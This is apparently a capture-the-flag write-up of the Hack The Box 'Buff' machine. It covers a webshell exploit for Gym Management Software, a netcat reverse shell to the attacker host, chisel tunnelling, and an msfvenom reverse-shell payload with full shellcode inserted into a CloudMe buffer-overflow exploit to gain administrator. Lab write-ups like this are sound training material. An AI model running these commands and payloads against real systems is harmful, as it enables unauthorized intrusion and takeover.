My first step was to run Nmap against the host to identify running services:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# Nmap 7.91 scan initiated Fri Nov 20 14:21:08 2020 as: nmap -sV -O -p- -sC -oN scan 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.024s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 20 14:24:09 2020 -- 1 IP address (1 host up) scanned in 181.05 seconds
From the output you can see there are 2 services running, HTTP on port 8080, and Pando-pub on 7680. I decided to start with HTTP. Browsing to the website you can see a page relating to fitness. After browsing the website and looking at the contact page, i found its created by Gym Management Software 1.0. I did a Google search for exploits involving this software and discovered THIS one. I downloaded the exploit and ran it as advertised, it successfully generated a shell on the Buff machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root💀kali)-[/home/kali/Documents/buff]
└─# python 48506.py http://10.10.10.198:8080/ 1 ⨯
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> dir
�PNG
▒
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
24/11/2020 18:25 <DIR> .
24/11/2020 18:25 <DIR> ..
24/11/2020 18:25 53 kamehameha.php
1 File(s) 53 bytes
2 Dir(s) 7,133,868,032 bytes free
From here I was able to capture the user flag from the Shaun account.
1
2
3
4
C:\xampp\htdocs\gym\upload> type c:\users\shaun\Desktop\user.txt
�PNG
▒
[REDACTED]
The next step was to escalate privileges. I first created a persistent reverse shell to make it easier to enumerate the machine. I copied netcat to the buff machine using Impackets SMB server.
1
2
3
┌──(root💀kali)-[/var/www]
└─# python3 smbserver.py testshare -smb2support /var/www/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
I copied nc.exe into /var/www then copied that to the buff machine:
1
2
3
4
C:\xampp\htdocs\gym\upload> copy \\10.10.14.19\testshare\nc.exe
�PNG
▒
1 file(s) copied.
I then started a listener on Kali on port 2600:
1
2
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600
Then ran Netcat on buff sending a PowerShell session to 2700 on Kali:
1
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.19 2600 -e powershell
1
2
3
4
5
6
7
8
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600 1 ⨯
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.198] 49708
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\gym\upload>
As you can see i the output, the reverse shell was generated successfully. I next browsed around the machine looking for anything that could provide privilege escalation. I discovered that in the Downloads folder there is a file called CloudMe_1122.exe.
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Users\shaun\Downloads> dir
dir
Directory: C:\Users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
PS C:\Users\shaun\Downloads>
After some googling I discovered this program runs on port 8888. I ran netstat and found there was in fact a service listening locally on port 8888, and so it was very likely this was the CloudMe software running.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
PS C:\Users\shaun\Downloads> netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5708
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 6508
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6544
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 524
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1052
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1580
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2236
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 684
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.198:8080 10.10.14.19:54178 CLOSE_WAIT 6544
TCP 10.10.10.198:8080 10.10.14.19:54182 CLOSE_WAIT 6544
TCP 10.10.10.198:8080 10.10.14.19:54220 ESTABLISHED 6544
TCP 10.10.10.198:49677 10.10.14.19:2600 CLOSE_WAIT 7792
TCP 10.10.10.198:49686 10.10.14.19:2700 ESTABLISHED 3576
TCP 10.10.10.198:49688 10.10.14.19:2600 CLOSE_WAIT 7368
TCP 10.10.10.198:49690 10.10.14.19:2700 ESTABLISHED 7820
TCP 10.10.10.198:49703 10.10.14.19:2525 ESTABLISHED 3140
TCP 10.10.10.198:49708 10.10.14.19:2600 ESTABLISHED 7796
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 6348
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5860
TCP [::]:135 [::]:0 LISTENING 952
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 6508
TCP [::]:8080 [::]:0 LISTENING 6544
TCP [::]:49664 [::]:0 LISTENING 524
TCP [::]:49665 [::]:0 LISTENING 1052
TCP [::]:49666 [::]:0 LISTENING 1580
TCP [::]:49667 [::]:0 LISTENING 2236
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 684
UDP 0.0.0.0:123 *:* 3964
UDP 0.0.0.0:5050 *:* 5708
UDP 0.0.0.0:5353 *:* 1124
UDP 0.0.0.0:5355 *:* 1124
UDP 0.0.0.0:51203 *:* 1124
UDP 0.0.0.0:59591 *:* 1124
UDP 0.0.0.0:62872 *:* 1124
UDP 0.0.0.0:65365 *:* 1124
UDP 10.10.10.198:137 *:* 4
UDP 10.10.10.198:138 *:* 4
UDP 10.10.10.198:1900 *:* 6064
UDP 10.10.10.198:63108 *:* 6064
UDP 127.0.0.1:1900 *:* 6064
UDP 127.0.0.1:63109 *:* 6064
UDP 127.0.0.1:63756 *:* 3060
UDP [::]:123 *:* 3964
UDP [::]:5353 *:* 1124
UDP [::]:5355 *:* 1124
UDP [::]:51203 *:* 1124
UDP [::]:59591 *:* 1124
UDP [::]:62872 *:* 1124
UDP [::]:65365 *:* 1124
UDP [::1]:1900 *:* 6064
UDP [::1]:63107 *:* 6064
UDP [fe80::6533:1880:c4d1:fb8f%10]:1900 *:* 6064
UDP [fe80::6533:1880:c4d1:fb8f%10]:63106 *:* 6064
PS C:\Users\shaun\Downloads>
I did some searching for an exploit for CloudMe and discovered THIS one. The only difficulty is this is a remote buffer overflow exploit and the CloudMe service is only listening locally, so can’t be accessed with the Kali machine. The way to circumvent this is by reverse tunnelling the service on 8888 to Kali so it can be accessed remotely. I did this using a tool called CHISEL.
I began by starting the chisel server on the Kali machine. This is what the client on the Buff machine will connect to to create the tunnel.
1
2
┌──(root💀kali)-[/home/kali/Documents/buff]
└─# chisel server -p 2700 --host 10.10.14.19 --reverse
I next copied chisel to the Buff machine using the same method previously for netcat. The Chisel client was then run forwarding port 8888 to kali so it can be accessible on port 2850.
1
2
3
4
PS C:\xampp\htdocs\gym\upload> ./chisel.exe client 10.10.14.19:2700 R:2850:127.0.0.1:8888
./chisel.exe client 10.10.14.19:2700 R:2850:127.0.0.1:8888
2020/12/04 18:32:02 client: Connecting to ws://10.10.14.19:2700
2020/12/04 18:32:02 client: Connected (Latency 22.261ms)
This means that port 8888 can be accessed from the Kali machine on 127.0.0.1:2850. So now i had to run the exploit against that port.
The exploit requires some minor editing before it can be run. The payload needed to be altered to a reverse shell is spawned rather thatn calc.exe. The port also had to be modified so it interacts with port 2850 and not 8888.
I generated the payload using the following command:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root💀kali)-[/usr/share/windows-resources/binaries]
└─# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2525 -b '\x00\x0A\x0D' -f python 1 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf = b""
buf += b"\xba\x4b\xab\xb3\x24\xda\xcd\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x83\xc7\x04\x31\x57\x0e\x03\x1c\xa5\x51"
buf += b"\xd1\x5e\x51\x17\x1a\x9e\xa2\x78\x92\x7b\x93\xb8\xc0"
buf += b"\x08\x84\x08\x82\x5c\x29\xe2\xc6\x74\xba\x86\xce\x7b"
buf += b"\x0b\x2c\x29\xb2\x8c\x1d\x09\xd5\x0e\x5c\x5e\x35\x2e"
buf += b"\xaf\x93\x34\x77\xd2\x5e\x64\x20\x98\xcd\x98\x45\xd4"
buf += b"\xcd\x13\x15\xf8\x55\xc0\xee\xfb\x74\x57\x64\xa2\x56"
buf += b"\x56\xa9\xde\xde\x40\xae\xdb\xa9\xfb\x04\x97\x2b\x2d"
buf += b"\x55\x58\x87\x10\x59\xab\xd9\x55\x5e\x54\xac\xaf\x9c"
buf += b"\xe9\xb7\x74\xde\x35\x3d\x6e\x78\xbd\xe5\x4a\x78\x12"
buf += b"\x73\x19\x76\xdf\xf7\x45\x9b\xde\xd4\xfe\xa7\x6b\xdb"
buf += b"\xd0\x21\x2f\xf8\xf4\x6a\xeb\x61\xad\xd6\x5a\x9d\xad"
buf += b"\xb8\x03\x3b\xa6\x55\x57\x36\xe5\x31\x94\x7b\x15\xc2"
buf += b"\xb2\x0c\x66\xf0\x1d\xa7\xe0\xb8\xd6\x61\xf7\xbf\xcc"
buf += b"\xd6\x67\x3e\xef\x26\xae\x85\xbb\x76\xd8\x2c\xc4\x1c"
buf += b"\x18\xd0\x11\xb2\x48\x7e\xca\x73\x38\x3e\xba\x1b\x52"
buf += b"\xb1\xe5\x3c\x5d\x1b\x8e\xd7\xa4\xcc\xbb\x2d\xa8\x1f"
buf += b"\xd4\x33\xb4\x16\xf9\xbd\x52\x42\x11\xe8\xcd\xfb\x88"
buf += b"\xb1\x85\x9a\x55\x6c\xe0\x9d\xde\x83\x15\x53\x17\xe9"
buf += b"\x05\x04\xd7\xa4\x77\x83\xe8\x12\x1f\x4f\x7a\xf9\xdf"
buf += b"\x06\x67\x56\x88\x4f\x59\xaf\x5c\x62\xc0\x19\x42\x7f"
buf += b"\x94\x62\xc6\xa4\x65\x6c\xc7\x29\xd1\x4a\xd7\xf7\xda"
buf += b"\xd6\x83\xa7\x8c\x80\x7d\x0e\x67\x63\xd7\xd8\xd4\x2d"
buf += b"\xbf\x9d\x16\xee\xb9\xa1\x72\x98\x25\x13\x2b\xdd\x5a"
buf += b"\x9c\xbb\xe9\x23\xc0\x5b\x15\xfe\x40\x6b\x5c\xa2\xe1"
buf += b"\xe4\x39\x37\xb0\x68\xba\xe2\xf7\x94\x39\x06\x88\x62"
buf += b"\x21\x63\x8d\x2f\xe5\x98\xff\x20\x80\x9e\xac\x41\x81"
The payload was then added to the exploit. I also modified the the port from 8888 to 2850:
1
2
3
4
5
6
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,2850))
s.send(buf)
except Exception as e:
print(sys.exc_value)
Once these changes had been made, i created a netcat listener to listen on port 2525 as specified in the payload I created:
1
2
3
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2525
listening on [any] 2525 ...
The exploit was then run:
1
2
┌──(root💀kali)-[/home/kali/Documents/buff]
└─# python 48389.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2525
listening on [any] 2525 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.198] 49703
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
C:\Windows\system32>cd /
cd /
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users
16/06/2020 19:52 <DIR> .
16/06/2020 19:52 <DIR> ..
20/07/2020 11:08 <DIR> Administrator
16/06/2020 14:08 <DIR> Public
16/06/2020 14:11 <DIR> shaun
0 File(s) 0 bytes
5 Dir(s) 7,280,562,176 bytes free
C:\Users>Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>ir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\Administrator\Desktop
18/07/2020 16:36 <DIR> .
18/07/2020 16:36 <DIR> ..
16/06/2020 15:41 1,417 Microsoft Edge.lnk
04/12/2020 18:23 34 root.txt
2 File(s) 1,451 bytes
2 Dir(s) 7,280,562,176 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]
As you can see from the output, the exploit worked successfully, the reverse shell was captured by the netcat listener and I was able to capture the root flag.